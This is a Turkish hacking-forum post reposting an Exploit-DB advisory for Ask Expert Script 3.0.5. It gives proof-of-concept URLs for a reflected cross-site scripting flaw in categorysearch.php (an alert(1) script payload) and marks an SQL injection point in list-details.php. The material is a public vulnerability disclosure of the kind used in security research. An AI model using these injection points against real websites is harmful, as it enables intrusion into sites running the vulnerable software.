İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection

26-02-2019 21:27
#1
Ludas - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
Ludas.py
Yaş:
19
Mesajlar:
216
Teşekkür (Etti):
27
Teşekkür (Aldı):
39
Konular:
28
# Exploit Title: Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection

# Exploit yazarı : Mr Winst0n

# Yazar E-posta : manamtabeshekan[@]gmail[.]com

# Keşif tarihi : February 19, 2019

# Yayınlayan : http://www.phpscriptsmall.com/

# Yazılım linki : https://www.phpscriptsmall.com/produ...expert-script/

# Test edilen versiyon : 3.0.5

# Üstünde test edildi : Kali linux, Windows 8.1





# PoC:



# Cross Site Scripting:


# http://localhost/[PATH]/categorysearch.php?cateid=[XSS]



# http://localhost/[PATH]/categorysearch.php?cateid=<scRiPt>alert(1)</ScrIpT>



# SQL Injection:



# http://localhost/[PATH]/list-details.php?view=[SQL]

--------------------------------------------------------------------------

Exploit : https://www.exploit-db.com/exploits/46426

Kullanıcı İmzası

|~ Yalnızlık olsun istediğin, uzaya mahkum ederim. ~|

Telegram ⋟ @Ludas_THT

|~ Vaktimiz doldu, artık gözlerin kapalı. ~|
Jad3s Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı